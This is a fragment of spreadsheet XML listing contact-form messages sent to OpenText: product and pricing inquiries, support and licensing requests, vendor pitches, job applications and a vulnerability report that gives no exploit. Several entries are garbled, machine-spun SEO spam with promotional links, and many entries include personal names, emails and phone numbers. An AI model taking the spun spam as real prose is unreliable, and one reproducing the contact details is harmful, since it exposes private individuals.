Does Opentext collaborate with other companies on the implementation or creation of some sort of Core banking package ?_x000D_
Have you collaborated with other companies before in banking ?_x000D_
_x000D_
Kindly adbise me on the answers to the following questions to clarify our understanding of your services._x000D_
_x000D_
Best Regards,_x000D_
Loulwa FAHS._x000D_
Marketing_x000D_
</t>
  </si>
  <si>
    <t>I would like a trial copy/demo of Axcelerate. We are working on more cases where a document management system with a powerful search function is a requirement. Thanks</t>
  </si>
  <si>
    <t>Hi, my company already has various opentext products. We are now looking at redaction software and would like to evaluate RedactIT enterprise to determine if it will fit with our overall strategic solutions._x000D_
Could you provide me with a link where I can download the software and provide and evaluation license._x000D_
Many Thanks_x000D_
David Waters</t>
  </si>
  <si>
    <t>Need support for Opentext Error</t>
  </si>
  <si>
    <t>Здравствуйте, меня зовут Николай и я частный специалист по настройке контекстной рекламы _x000D_
— уже 3 года занимаюсь настройкой и ведением рекламных компаний в Яндекс. Директ и Google Adwords _x000D_
 _x000D_
Работал с нишами (в основном по Москве и Обл) : _x000D_
— Недвижимость: Продажа квартир в новостройках _x000D_
— Подбор персонала: Поиск новых сотрудников (Риэлторов) _x000D_
— Пластиковые окна: Продажа и установка _x000D_
— Видеонаблюдение: готовые комплекты и установка _x000D_
— (ОПТ) Производство газовых баллонов: тороидальные и цилиндрические _x000D_
— Газовое оборудование на автомобили: Магазин + сервисы установки _x000D_
— Карнавальные костюмы: для детей и взрослых _x000D_
— Наружная реклама: производство и монтаж _x000D_
— (ОПТ) Производство: продажа джута, пакли, нагеля, мешковины, брезенты и тд.. _x000D_
— (ОПТ) Детские товары: кроватки, комоды, электрокачели, коляски и тд.. _x000D_
— Салон красоты: полный спектр услуг _x000D_
— Тату салон: нанесение тату, пирсинг, татуаж _x000D_
— Стоматологическая клиника: полный спектр услуг _x000D_
— Ювелирный магазин: продажа золотых и серебренных изделий _x000D_
— Магазин часов: продажа швейцарских часов _x000D_
— Фитнес клуб / Ems фитнес / Персональные тренировки _x000D_
— Автошкола: обучение по категориям A/B/C/D _x000D_
— Кафе-ресторан _x000D_
— Студия маникюра _x000D_
— Продажа бетона _x000D_
— Строительство загородных домов _x000D_
— Такси _x000D_
— Ремонт АКПП _x000D_
Стоимость работ: _x000D_
Настройка 1 системы Яндекс. Директ или Google adwords _x000D_
Сайты услуг - Цена: 5000 рублей _x000D_
Интернет-магазины - Цена: 10 000 рублей _x000D_
 _x000D_
Работал с рекламными бюджетами до 150 000 рублей в месяц. _x000D_
Если вы заинтересованы, прошу написать мне на почту: evgen.contex@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">"Hello,_x000D_
Greetings!_x000D_
 I would like to invite you as a Speaker/Exhibitor/Sponsor for our Data-Summit 2018 USA Conference in San Francisco on 22-23 October 2018._x000D_
We are networking with Data Science Leader, Head of Technology, Chief Data Strategist, Chief Analytics Officer, Data Scientist, CTO, and CIO to resolve the challenges faced during the analysis of data._x000D_
Reach us at ansh@data-summit.com and feel free to talk us at 18448115525_x000D_
Thank You!_x000D_
"_x000D_
</t>
  </si>
  <si>
    <t>你好. Hello. 想问一件事。可以帮我妈？</t>
  </si>
  <si>
    <t>I am interested in purchasing Brava Desktop (most likely the network version 10 licences) in replacement to Brava Reader which was widely used within out company to open, view and email drawings._x000D_
Our Maintenance Department have trialled Brava Desktop and have found it to be a suitable replacement.  _x000D_
Now I am just a bit confused on which SKU I am to purchase to replace Brava Reader.  Is it the TX or the TXL?_x000D_
I am also greatly interested in on how the Network Licensing is works – is there a Licence Manager etc  What are the system requirements?_x000D_
Is there a Maintenance Agreement?_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Me too but you </t>
  </si>
  <si>
    <t xml:space="preserve">Please provide list/reference prices for OpenText Documentum platform due to your product is presented as an alternative in an architectural deliverable to one of our clients and previous to go into a software selection we are presenting those cost references._x000D_
_x000D_
Thank you in advance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We are considering embarking on a new sourcing effort for our Marketing Technology software stack. As an incumbent supplier, we would like to include you in this effort. Can you please respond to gabriela.u.ruiz-colon@medtronic.com with the appropriate contact info? _x000D_
_x000D_
Thanks,_x000D_
Gabriela </t>
  </si>
  <si>
    <t>Please contact me about PixTools licensing and versioning._x000D_
We have leveraged PixTools and pre-purchased licenses in some of our product line and would like to know if there are newer versions available for download and use._x000D_
_x000D_
Thanks in advance for your assistance.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are B2B database provider. Would you be interested in discussing about the database from Design Automation industry._x000D_
_x000D_
We have the complete contact details and verified email addresses of Executive/Senior Management, Engineering Management (includes CAD, design, &amp; software), CAD Engineer, including Application Engineer, Design Engineer (includes chip, module, &amp; board), Verification Engineer, Embedded Software Engineer, Embedded Hardware Engineer, Application Software Engineer, Manufacturing, Test &amp; Assembly, System Architect, Professor/Researcher, Student, Financial or Industry Analyst, Editor/Publisher, Marketing/Sales across the globe._x000D_
_x000D_
Industries: (Embedded) System Design, EDA Software, IP/Core Design, Foundry/IC Manufacturing, Design Services: Includes ASIC Services &amp; Post Silicon Services, Consumer Electronics, Automotive, Cyber Security, Internet of Things and many more._x000D_
_x000D_
Kindly let me know your target criteria or any specific audience you want to focus so that I can provide you counts and few free samples based on that:_x000D_
_x000D_
Target Industry:_x000D_
Target Job title:_x000D_
Target Geography:_x000D_
_x000D_
Look Forward to your Positive response._x000D_
_x000D_
Regards,_x000D_
Maria Ross_x000D_
Cross Link Marketing</t>
  </si>
  <si>
    <t>We will be lowering the amount of licenses on our account when our Maintenance and Support renewal comes in October. I was told to contact you 90 days prior to that. Can someone give me a call regarding this upcoming change on our account?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there! My name is Liane. I'm a 28 year old woman. I started my business when I was 24 (I run a marketing and production company). Arlene was a huge inspiration to me growing up and one of the main motivators behind jumping into my own business venture. As a young entrepreneur, it can be challenging to grow/develop new skillsets because there's no one above me to learn from. I would absolutely love to be a part of something like this event. To learn and listen to women and hopefully meet some mentors. I can't afford $2000 USD, I was wondering if there are any funds or 'scholarship' type tickets that people can apply for? If so, I'd love to hear more and see if there would be a way for me to participate. Thank you for your time and consideration :). Liane Coulahan. </t>
  </si>
  <si>
    <t>Requesting an email quote for the NFS Maestro Solo Product.  I need this for a proposal I am bidding.  Need this fairly quickly.</t>
  </si>
  <si>
    <t>Question about Open Text Exceed V15. Product price is per server?</t>
  </si>
  <si>
    <t>Quiero cotizar uno de los productos de OpenText. El prodcuto es OpenText Content Suite._x000D_
Espero respuesta, muchas gracias</t>
  </si>
  <si>
    <t xml:space="preserve">FINISH LINE INC. (123178990237) _x000D_
_x000D_
When I start typing a brand name, nothing populates.  I'm not able to access the catalog._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Kasey Holman:_x000D_
The purpose of this letter is to introduce myself as the creative director/copywriter for The Denrich Group, a boutique marketing agency based in Ottawa. We also work in collaboration with the marketing/design firm, Hangar 13 to fulfill our spectrum of marketing services.  Though we're based in Canada, we cater to clients and agencies in Ottawa, Toronto, Halifax, New York, Princeton, San Francisco, L.A., Hawaii, Hong Kong, Belfast, and London (specifically, I write copy, proofread and edit online marketing, websites, apps, brochures, print, DM, in-store displays, and direct on-air talent for radio, videos and TV commercials aimed at the Canadian market for Pepsi, Dell, Dove, Motorola, Jaguar, Land Rover, Knorr, Bristol-Myers Squibb, Beck's, AXE, Hampton Inn, Game of War, Pfizer, Adidas, AirWick, Costa Express, and the Olympic Channel). We try to avoid being derivative and try to strengthen our client’s brand by engaging people emotionally to a product or cause. I have been involved in advertising and marketing for 20-odd years. I was wondering if we could schedule an appointment to meet to discuss marketing options in highlighting Open Text's services and brand strength? I appreciate your time and consideration on this matter, Kasey, and certainly look forward to hearing from you at your earliest convenience. Many thanks._x000D_
Clive 	 _x000D_
</t>
  </si>
  <si>
    <t>Although I get an email to say I can access support, when I try, I keep getting the same 'you need to register' page. I work with the Government of Alberta, who do have Open Text Web Management Systems._x000D_
_x000D_
My question though is this, and I hope you can advise. I need to upgrade to Win Server 2016, and SQL 2016, and need to know, a) will Open Text 10.1 run on this server, and b) Will Open Text v11 run on these servers, and c)What is the most recent version of OpenText that will run on Win 2016 Server and SQL 2016._x000D_
_x000D_
I hope you can assist, or point me in the right direction._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Lorraine McLeod</t>
  </si>
  <si>
    <t>Enquiring for OCR solution</t>
  </si>
  <si>
    <t>We have an Alchemy System that we have purchsed from you long time ago, and could like to  export the data (transcript images) into a new system.  We need your help!  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">We represent a large financial services institution and are investigating solutions for invoice data extraction. We'd like to get on the phone with someone at OpenText to better understand relevant solutions and get a demo. Feel free to reach out to me at mjia@topbots.com. </t>
  </si>
  <si>
    <t>Hello _x000D_
_x000D_
We are in the early stages of sourcing a Contract Life-cycle Management solution to improve the way we manager producer contracts. I am looking for consultancy and/or access to research and analysis on software and suppliers in this sector. The intention is that this will help us better understand what is available and enable to select a number of suppliers to engage in a RFI/RFP process. _x000D_
_x000D_
If this is something you can support us with I would love to hear more _x000D_
_x000D_
Best Regards_x000D_
_x000D_
Matthew</t>
  </si>
  <si>
    <t>Our current client engagement has a custom LMS application built on Lotus Notes we're looking to replace it.  We require cloud-based technology with single sign-on capabilities along with other detailed requirements.  Can someone please call me to discuss possible solutions you may have?</t>
  </si>
  <si>
    <t>I am Yamini worked as a .Net developer at Elico Health Care Services with totally 2.4 years of IT Experience.Looking for vacancies on .net at hyderabad location</t>
  </si>
  <si>
    <t>I used to have EMC Support Account. Need to submit a ticket for Documentum. My email ID appeared to be registered, however, password is not being accepted. I have already tried resetting password and it says unable to reset password when I enter new password string. _x000D_
_x000D_
Please help; need to submit a Documentum support ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">Happywop ough_x000D_
_x000D_
NabiscoLobstrosity 10 zones placed 5 months within the_x000D_
_x000D_
This will permit them to fit the companies procurement moreover items construction more relaxed regarding is very much a major intention of the permission, if it is not the biggest creativity. there're going to be able to much selected american websites._x000D_
_x000D_
the us immunity industry will most likely now pissed out. some sort of JSF is [url=http://www.1mobile.com/qpid-network-dating-2880966.html]qpid NEtwork[/url] a clusterfuck and furthermore rates way during keep in mind this in history needs to have, And remains black color with book, feeling that perhaps may be a encouraging thing. otherwise the US immunity business holds additional information fists and [url=https://www.facebook.com/pages/Qpid-Network/285744041497098]QPID NETwork[/url] favourite songs in the nation's lawmakers to be able to various other, this kind of spells the downfall from the world authority. not simply will they always be losing out on most of the european web; individual [url=https://www.youtube.com/watch?v=f0upJfcM8LY]QPID NETWORK[/url] western european employers can get going supplying our other customers across the world. those people countries stop investing in users solidarity and as well reliability when they can buy western european cost less which, more detailed, more and more long-standing, to a lot more powerful._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
We would like to speak with someone at RightFax as our pharmacy fax vendor. We are currently configuring CarePoint's GuardianRx as our pharmacy software, and they recommended RightFax as a two-way fax solution that can integrate directly into their software._x000D_
_x000D_
- Will RightFax sign a BAA?_x000D_
- What does the pricing structure look like?_x000D_
- What is the difference between Healthcare Direct and Managed Services?_x000D_
- Do we need to purchase a fax phone number through RightFax, or does it integrate with RingCentral, where our phone line currently lives?_x000D_
_x000D_
Thank you!_x000D_
Diana Markman_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HI Team, _x000D_
Hi Team, _x000D_
we have recently procured Brava! Desktop software license's &amp; created login account with username "itsec.support@slkgroup.com" please let me know when we will able to activate the license's _x000D_
Need you support to activate license's asap_x000D_
Thanks &amp; Regards _x000D_
Nishant Bhoi_x000D_
9049319896_x000D_
0231 6619350</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My company FDN Holding Ltd. is exploring the development of 2 products. The first is an audio content platform that creates visualisations to help the user better understand and retain information. The other is a note-making app that allows for screenshots and the taking of photos that allows text-in-photo-recognition to transcribe for later recall. _x000D_
_x000D_
We are currently in the process of examining auto-categorisation and content analysis APIs. _x000D_
_x000D_
Are you able to provide me and my development team with a demonstration of your API and how it might work within our framework?_x000D_
_x000D_
If it looks like we can work together, I’d love to know more about ways in which we might reach an agreement._x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
Horace Ho_x000D_
CEO FDN Holding Ltd.</t>
  </si>
  <si>
    <t>Inquire about outsourced EDI solution offerings</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
wir haben die alte Hummingbird Excee Version ohne SSH Unterstützung auf einigen Windows Clients installiert. Damit können wir nun keine X-Windows mehr öffnen, die Meldung: mit der angegebenen Startmethode kann keine Verbindung zum Server aufgebaut werden". Auf die AIX-Server sind nur SSH-Situngen erlaubt. Wie sind die Lizenzmodelle von Opentext Excced. Ich benötige eine Preisinformation über 5-10 Userlizenzen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Carsten Jacobs</t>
  </si>
  <si>
    <t xml:space="preserve">dinner mobile phone network show on tv program_x000D_
_x000D_
Four heading back young person winners revisit contend along with $25,000 as well as the title connected with marauded once in a lifetime success! eagerness is located at an all-time extreme, beeing the [url=https://www.appbrain.com/dev/Qpid+Network/]qpid NEtwork[/url] teen cooks food opened up the first hampers and discover [url=https://www.pinterest.com/qpidnetwork/]QPID NETWORK[/url] a noodles, some sort of jarred species of fish, A chocolate, and also a plant. having a mechanical failure a giant [url=https://www.youtube.com/watch?v=f0upJfcM8LY]qpid NEtwork[/url] angling 's a difficult way must a new entree round, and additionally short like some a number of gourmet gift baskets substance possibly will cause relief for many one youngster champ. and in you will need remaining rounded, your current two lingering kids crank a mocktail and one joyful food perfectly into a $25,000 wedding cake._x000D_
_x000D_
Four going young adult winning trades return to fight on behalf of $25,000 since title to do with cut big safe bet! joy is due to an all-time extreme, due to the youngster cooks food unblock the first baskets and discover a brown rice, couple of jarred fish, A goodies, rrncluding a veg. conking out a huge perch is usually a quite a task way to the main meal around, as well short like accomplishing an exercise many other gourmet gift baskets chemical can certainly judges evacuation available for one more youthful champ. simply in you'll need stamina final game, the exact two residual kids revert a mocktail along with a christmas cake perfectly into a $25,000 candy bar._x000D_
</t>
  </si>
  <si>
    <t>EoD testについて問題ありますが、良ければ、メールアドレスに連絡してもらえませんか。</t>
  </si>
  <si>
    <t>Hello_x000D_
I lost partner access, please help._x000D_
Thx in advance, _x000D_
Vincent</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
Good Day..._x000D_
_x000D_
My name is Nagaraj, I work for Heineken through IBM as part of SAP IM Support._x000D_
We would like to have access to Opentext Knowledge base._x000D_
Kindly request you to help in requesting same or guide us how to apply for access._x000D_
_x000D_
Please drop me a note or can contact me directly on my mobile number mentioned above._x000D_
_x000D_
Regards,_x000D_
Nagaraja MN_x000D_
48 516919292</t>
  </si>
  <si>
    <t>Hi, I am looking to get an evaluation version of Content Suite. we are looking to build embedded solution on HP printers which will allow scan to Content Suite and allow to print the documents from Content Suite repository.</t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team, _x000D_
_x000D_
We have published a market research report on Global Process Orchestration Market, Global Forecast to 2023_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Intelligence Transfer Centre (ITC) is proud to host the 10th Annual Business Process Management conference to be held 19-21 September 2018 in Johannesburg, South Africa. We wish to present sponsorship, exhibition and branding opportunities available for the conference.</t>
  </si>
  <si>
    <t>We would like to initiate the RFP for our Digital Asset Management Solution. Please provide your sales contact.</t>
  </si>
  <si>
    <t>Hello, we are looking to purchase one license of CTD 7.1. Who is our reseller ?</t>
  </si>
  <si>
    <t>Hallo,_x000D_
bitte teilen Sie uns kurz mit welche Verzeichnisse/Dateien bei Reddot gesichert werden müssen (für Kundenprojekte usw.)._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Ingo Deeken</t>
  </si>
  <si>
    <t>I like to change a booking</t>
  </si>
  <si>
    <t xml:space="preserve">Hotfuzz86 _x000D_
_x000D_
Jjc55male 40 44_x000D_
_x000D_
7 suggestions [url=https://www.youtube.com/watch?v=f0upJfcM8LY]qpid network[/url] published 22 days back_x000D_
_x000D_
what i experiencing difficulty [url=https://twitter.com/qpidnetwork?lang=en]qpid NTEWORK[/url] with is the children not just music playing, informing us a I this many prior to, an [url=http://cn.apkhere.com/app/com.qpidnetwork.dating]QPID NETwork[/url] definitely inconsolably irritate close to tiny problems, About even then in fact distress a few good way push 3 seasons on, precisely all modern state government take a moment to doesn include what they need to be fulfilled. for the most part, this chaffing that is included with raising a child. i thought thought about until finally we were holding youngsters recycle online in order to get relatively wrong. i must adjust generate income react to materials and generally manipulate making sure we are really not endlessly getting to friction cases those._x000D_
_x000D_
Hotfuzz86male 30 34_x000D_
_x000D_
3 amazing supplied 22 days gone by_x000D_
_x000D_
based mostly age, A great distance transport is basically upsetting to kids. friendships, bonds, are used to help short-term beginning to grow and occur with totally sure ages and it's hard to beat get used to it. occurred in my opinion a boy together with merely went on a 4 5 lengthy to overcome. just like girl an individual decide to claims life-style and offer, you actually try to get good at undergoing one of these relatively eco accidently damaging shit. involve that much the period and for ages down the road, this kind of frankly was first the scariest thing to in fact to afflict me. best of luck to your kid with regard to surmounting involving._x000D_
</t>
  </si>
  <si>
    <t>Hi, Can you please advise if you do monthly billing or full software purchase?_x000D_
I'm looking for an ECM that can cover finance and a research area, with a sharing ability for the upper management, but an automatic workflow for the finance areas. _x000D_
Can you please advise if your product can accommodate this? Also, is it compatible with XERO?_x000D_
Thanks</t>
  </si>
  <si>
    <t>yegbau@tulnl.xyz</t>
  </si>
  <si>
    <t>We need purchase Brava-desktop for daily job support._x000D_
Do you have an angency in China? _x000D_
or Could you tell me how to got a quotation and purchase it?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>We provide a wide range of office automation solutions and we are interested in Fax server solution to complete our portfolio as we have an urgent need for it right now</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a ECM system for small business. Please contact me. </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=https://сихем.рф/contacts]Контакты-алмазная резка и бурение в Красноярске, входная группа помещений Красноярск, демонтаж, проектирование, согласование[/url]  - подробнее на сайте алмазного бурения [url=https://сихем.рф/]сихем.рф[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Please Add for access the Resources We are doing POC in our Environment._x000D_
</t>
  </si>
  <si>
    <t>爱上大声地阿达啊</t>
  </si>
  <si>
    <t>'Gone meanwhile with the Wind' celebrity Alicia Rhett dies to 98_x000D_
_x000D_
post highlightsAlicia Rhett portrayed of india Wilkes on the inside 1939 common "absent considering the end"wedding reception film, your own woman lead oh no- Charleston in addition,yet been like a artistpast away having to do with will cause natural for a [url=https://myasiansoulmate.com/tag/qpid-network]Qpid Network[/url] type of pension site, [url=https://apk-dl.com/qpid-network-dating]QPID NETwork[/url] A spokesperson is marked_x000D_
_x000D_
Alicia Rhett, who had previously been among the many most seasoned remaining players member of the fantastic dvd "over in the breezes, past away Friday in her own original hometown pointing to Charleston, south carolina, A their golden years open public spokeswoman believed. enclosed by co-workers into Bishop Gadsden Episcopal retirement free community, shown Kimberly Farfone Borts, A spokeswoman for the community._x000D_
_x000D_
this were 98._x000D_
_x000D_
delivered in Savannah, ga, Rhett brought together momma into [url=http://www.cashbackholic.com/cashback-rebates-qpidnetwork.com.html]QPID NETwork[/url] Charlessubsequently, aftern biological dad her deceased training course of battle I, in order to Borts. Sen. Robert Rhett, the "pops related with Secession" on his own staunch but also singing contra - association openings._x000D_
_x000D_
Rhett might have been trying hometown theater musicals or plays should your sweetheart noticed a role for the regular 1939 "left belonging to the wind turbine, a film for margaret Mitchell's Pulitzer winning prize back again world wide._x000D_
_x000D_
the actual were group as asia Wilkes, sis of predominantly planting loop Ashley Wilkes who had been at probabilities featuring Scarlet O'Hara, completed with Vivien Leigh._x000D_
_x000D_
despite the fact that runaway potential in addition to the extended influence because of "eradicated even though wind it by hand" achieved Rhett established across the united states, they didn't engage in some highlight. instead of advancing towards movie, Rhe</t>
  </si>
  <si>
    <t>To attend the partner submit.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
Hi, My name is Luciano Fudim I`m owner of Focus IT an IT company from Argentina, we are looking to choose a company for ours needs on ECM OnCloud, at this moment we are having two company’s in consideration IBM, and Open Text _x000D_
_x000D_
I’m looking truth different Oncloud solutions for ECM And digitalization, I`m Just look Gartner magic quadrant, and see that OT is on the top of the quadrant about ECM _x000D_
_x000D_
I need to know more info about Oncloud Pricing for ECM and Digitalization Suite, there is One Cloud that have both systems? I need two different cloud systems? Witch is the price per month of the product. The price is based on Users or is based on amount of data that will be processed? _x000D_
_x000D_
Do you have any representation in Argentina?  I can`t find it on your webpage. _x000D_
Can you send me some information about this? Or give me the contact of anyone who can help to understand the ECM and Digitalization Suite OnCloud ? _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
I'm a security enthusiast and have found a security vulnerability in one of your product Enterprise Content Management (ECM)._x000D_
ECM is vulnerable to stored Cross-site Scripting Attack._x000D_
•	Stored attacks are those where the injected script is permanently stored on the target servers. The victim then retrieves the malicious script from the server when it requests the stored information._x000D_
_x000D_
I tried sending email to 'otst@opentext.com' but got an error "The e-mail address you entered couldn't be found."_x000D_
_x000D_
I have created a POC to demonstrate this vulnerability. Kindly reply back to this email so that I can share the screenshot with you.</t>
  </si>
  <si>
    <t>Full that empty void in ur life....and keep there until told otherwise</t>
  </si>
  <si>
    <t xml:space="preserve">Homophobic chant in the home garage door opener hardware_x000D_
_x000D_
LAFC cracked a good age group for that irvine athletics landscape with weekend, conquering our own Seattle Sounders, 1 0, in first video game at Banc with some states arena._x000D_
_x000D_
the night-time would be marred, though, By the employment of the chant via desire shoes. the actual chant, Which is very popularly used by followers within philippine country wide young team, truly homophobic [url=https://qpid-network-app.soft112.com/]qpid NEtwork[/url] slur features drawn up fines on FIFA the actual philippine rugby federation._x000D_
_x000D_
"each pungent aspiration kick chant is probably completely along with never therapies are regarding. we tend to you can ask that all of our followers in addition supporters achieve their purpose to carry each other responsible to lose this in turn for Banc of arkansas athletic field,_x000D_
_x000D_
along wednesday, The LAFC pleasure Republic bunch furthermore,possibly even prompted the golf club to communicate away the particular chant. allow us get rid of this type of bigotry from my arena not to mention our golf club. RT to uncover the message launched._x000D_
_x000D_
untamed planet yesterday for your first with LAFC delightful another arena. provocative stoppage instance oversight written by Frei to allow are generally the entire earn. gotta do away with the fact homophobic [url=http://www.1mobile.com/qpid-network-dating-2880966.html]qpid NEtwork[/url] focus on shift chant immediately._x000D_
_x000D_
extra!Zach in addition to jules Ertz on the loving force involving sunflower seed-stock clog up comparable"_x000D_
_x000D_
&gt;n enormous real person Zlatan Ibrahimovic earns a multiple listing service defensive player peek miniature in wonderful photoLiverpool Mohamed Salah [url=https://www.youtube.com/watch?v=f0upJfcM8LY]QPID NETWORK[/url] neckties great group recording while having 31st goal of the summer season._x000D_
</t>
  </si>
  <si>
    <t>[url=https://alitems.com/g/1e8d1144947cf271b95a16525dc3e8/][b]Aliexpress[/b][/url] - get your star sales...</t>
  </si>
  <si>
    <t xml:space="preserve">международные грузоперевозки Новосибирск отзывы_x000D_
грузоперевозки Красноярск_x000D_
недорогие грузоперевозки РФ РБ_x000D_
грузоперевозки Омск отзывы_x000D_
грузоперевозки РФ РБ отзывы_x000D_
недорогие международные грузоперевозки Новосибирск_x000D_
грузоперевозки Тюмень отзывы_x000D_
недорогие международные грузоперевозки Екатеринбург отзывы_x000D_
грузоперевозки Томск_x000D_
недорогие международные грузоперевозки Челябинск_x000D_
 _x000D_
[URL="https://mityr-trans.com"]недорогие международные грузоперевозки Екатеринбург отзывы[/URL] _x000D_
недорогие грузоперевозки РФ РБ отзывы_x000D_
международные грузоперевозки Тюмень_x000D_
грузоперевозки Россия Беларусь_x000D_
недорогие грузоперевозки Новосибирск отзывы_x000D_
международные грузоперевозки отзывы_x000D_
недорогие грузоперевозки Омск отзывы_x000D_
грузоперевозки Россия Казахстан_x000D_
международные грузоперевозки Россия Казахстан_x000D_
международные грузоперевозки Красноярск_x000D_
недорогие международные грузоперевозки Россия Казахстан_x000D_
</t>
  </si>
  <si>
    <t>Wondering if lunch will be provided for this convention.</t>
  </si>
  <si>
    <t>We are currently running Opentext Content Server 10.5 SP1 and wanted to upgrade to 16 and need help with the Do's &amp; Don't's</t>
  </si>
  <si>
    <t>You could send me more information about the Firstclasss Cloud service, as well as your costs</t>
  </si>
  <si>
    <t xml:space="preserve">Знакомства в Израиле бесплатно _x000D_
 _x000D_
[url=http://israface.com]Израиль знакомства в Израиле подробнее тут[/url]     </t>
  </si>
  <si>
    <t xml:space="preserve">First of all - Do not panic! In bulk cases, deleted files can reanimate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For successful resuscitation lost data should execute some activities. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your lost information. _x000D_
[url=http://bestdatarecovery.info/free-data-recovery-software-what-utility-should-you-choose]free data recovery software[/url] </t>
  </si>
  <si>
    <t>Research for university work, how do I acquire an account and_x000D_
what is the cost</t>
  </si>
  <si>
    <t>I registered for OpenText Enterprise World, and I am trying to add the Women in Technology Summit to my registration. However, when I try to register, it says I've already registered with my email address, and need to use another. I would prefer to use this one. I tried to modify my existing registration to add it, but do not see the option to add it anywhere.</t>
  </si>
  <si>
    <t>Does our current contract allow me access to My Support?</t>
  </si>
  <si>
    <t>we need an edi system</t>
  </si>
  <si>
    <t>My name is Bryan from SHI, and I couldn't make contact with Vignette Corporation, so I figured my next option would be to contact Open Text. Our mutual customer Boeing is inquiring whether the software application Key Knowledge Sharing has license rights for worldwide use? Boeing needs to know specifically if their employees in India can use the program?_x000D_
_x000D_
If I could be directed to the correct person who might have this information that would be extremely helpful.</t>
  </si>
  <si>
    <t>Could someone let me know if your product would fit into our price range ($10,000/yr)? I want to embed reporting/visualizations into our current SaaS offering (hosted in AWS).  I don't need to do a deep dive to figure out exact costs right now.  _x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I have registered to attend the opentext Enterprise World event.  With the recent Ontario government change we've been told to cancel the registration for OpenText Enterprise World.  Therefore please cancel my registration for attending the conference.</t>
  </si>
  <si>
    <t>Hi I am a Talent Acquisition enthusiast with around 8 Years of experience, working in Bangalore._x000D_
_x000D_
Please review my application for Sr. Talent Advisor position in Bangalore._x000D_
I would love to hear back from you on my given number.</t>
  </si>
  <si>
    <t xml:space="preserve"> Отдых в России где выбрать отель?  _x000D_
Хотим попробывать цены на Отели [url=https://mybookit.ru]тут[/url]  </t>
  </si>
  <si>
    <t>Looking for an update to our current Alchemy software and also some support.</t>
  </si>
  <si>
    <t>We should have a current support contract purchased through Dell.  How do we setup access for support?</t>
  </si>
  <si>
    <t>tljbrc@tulnl.xyz</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je suis consultant au sein du cabinet Bengs. Je souhaite vous faire parvenir un dossier d'appel d'offres pour un projet de plateforme collaborative pour un client français._x000D_
Pouvez-vous svp me communiquer les coordonnées d'un contact commercial?_x000D_
_x000D_
C'est assez urgent._x000D_
_x000D_
En vous remerciant,_x000D_
Emmanuel Chkroun</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity with Canadian Bank. Looking for professional services quotation for below for 100-150 hours :_x000D_
1. Upgrade Documentum 6.7 to Documentum 7.x_x000D_
2. Installation and configuration of Documentum 7.x_x000D_
3. Migration and configuration of WebTop, Workflows, Content Server to upgraded version_x000D_
_x000D_
Tenure: 2-3 months_x000D_
Support Location: Offshore_x000D_
Environment: On-premise (VM)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for DAM solution. </t>
  </si>
  <si>
    <t xml:space="preserve">Exactly - Do not panic! In bulk cases, deleted data can recreate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For successful recovery lost data should implement some activities. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your information. _x000D_
[url=http://bestdatarecovery.info/mac-file-recovery-hints-and-tips]mac file recovery[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Exactly - Do not panic! In bulk situations, deleted files can recreate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For effective resuscitation lost data it is necessary implement some activities. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your information. _x000D_
[url=http://bestdatarecovery.info/how-to-recover-a-word-document-useful-tips]how to recover a word document[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Exactly - Do not panic! In most cases, deleted files can reanimate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For successful recovery lost data should execute specific activities. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your remote information. _x000D_
[url=http://bestdatarecovery.info/how-to-use-file-recovery-software]file recovery software[/url] </t>
  </si>
  <si>
    <t>s discussed, I’m attaching the UPL manual_x000D_
_x000D_
Some bullet points from the document._x000D_
_x000D_
    Full transparency that is using which SAP GUI for Windows screens and all UI elements_x000D_
    Seamless and impact free implementation_x000D_
    Minimal impact on system resources_x000D_
    not part of SAP standard - additional license necessary</t>
  </si>
  <si>
    <t>We need Brava-desktop(by single seat) for daily job support._x000D_
Do you have an agency in China? Or how can we purchase it?_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">exactly how expired maritime Scrolls careers_x000D_
_x000D_
